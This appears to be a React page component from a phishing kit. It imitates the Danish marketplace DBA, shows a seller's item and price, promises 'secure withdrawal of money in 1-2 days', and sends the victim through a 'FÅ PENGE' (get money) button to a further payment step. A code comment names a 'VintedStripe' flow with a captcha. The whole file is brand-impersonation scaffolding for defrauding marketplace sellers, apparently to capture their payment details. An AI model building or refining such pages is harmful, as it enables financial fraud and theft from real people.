import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DbaDkSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const PAGE_IMG = `${process.env.PUBLIC_URL || ''}/dk-dba/page.png`;
const FOOTER_IMG = `${process.env.PUBLIC_URL || ''}/dk-dba/footer.png`;
const DBA_LOGO = `${process.env.PUBLIC_URL || ''}/dk-dba/dba-logo.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

/**
 * DBA (DK) — success: layout som screenshot + CTA → index2 (VintedStripe2).
 * Flow: VintedStripe1 (captcha) → success → index2.
 */
function DbaDkSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'DK').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'DKK';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const productName = (pageData?.product_name || '').trim() || '—';
  const productId = (pageData?.page_code || pageCode || '').trim();

  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto) || PAGE_IMG;
  const showScreenshot = !rawPhoto || imgFailed;
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="dbadk-wrap">
        <div className="dbadk-loading">Indlæser…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="dbadk-wrap">
      <header className="dbadk-header">
        <div className="dbadk-header-top">
          <a href="#/" className="dbadk-logo" aria-label="DBA">
            <img src={DBA_LOGO} alt="dba" />
          </a>
          <div className="dbadk-search" aria-label="Søg">
            <input readOnly placeholder="Søg på DBA" />
            <button type="button">Søg</button>
          </div>
          <div className="dbadk-header-links" aria-hidden>
            <span>DBA Guide</span>
            <span>Opret bruger</span>
            <span>Kontakt kundeservice</span>
          </div>
        </div>
        <div className="dbadk-header-actions">
          <button type="button" className="dbadk-btn">
            Opret annonce
          </button>
          <button type="button" className="dbadk-btn dbadk-btn--ghost">
            Køb fragt
          </button>
        </div>
      </header>

      <main className="dbadk-main">
        <div className="dbadk-grid">
          <section>
            <h1 className="dbadk-left-title">{productName}</h1>
            <p className="dbadk-left-sub">{amountLine}</p>

            <div className="dbadk-image">
              <img
                src={showScreenshot ? PAGE_IMG : photoSrc}
                alt=""
                onError={() => setImgFailed(true)}
              />
            </div>

            <div className="dbadk-product-id">Produkt-id: {productId || '—'}</div>

            <div className="dbadk-note">
              <span className="dbadk-note-dot" aria-hidden />
              <span>Sikker hævning af penge på 1-2 dage</span>
            </div>
          </section>

          <aside className="dbadk-right-card">
            <div className="dbadk-right-brand" aria-hidden>
              <span>dba</span>
              <span style={{ opacity: 0.6 }}>ⓘ</span>
            </div>
            <p className="dbadk-right-amount">{amountLine}</p>
            <p className="dbadk-right-sub">{priceText === '—' ? '—' : priceText}</p>
            <Link className="dbadk-right-cta" to={index2Path}>
              FÅ PENGE
            </Link>
          </aside>
        </div>
      </main>

      <div className="dbadk-footer">
        <img className="dbadk-footer-img" src={FOOTER_IMG} alt="" />
      </div>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default DbaDkSuccess;

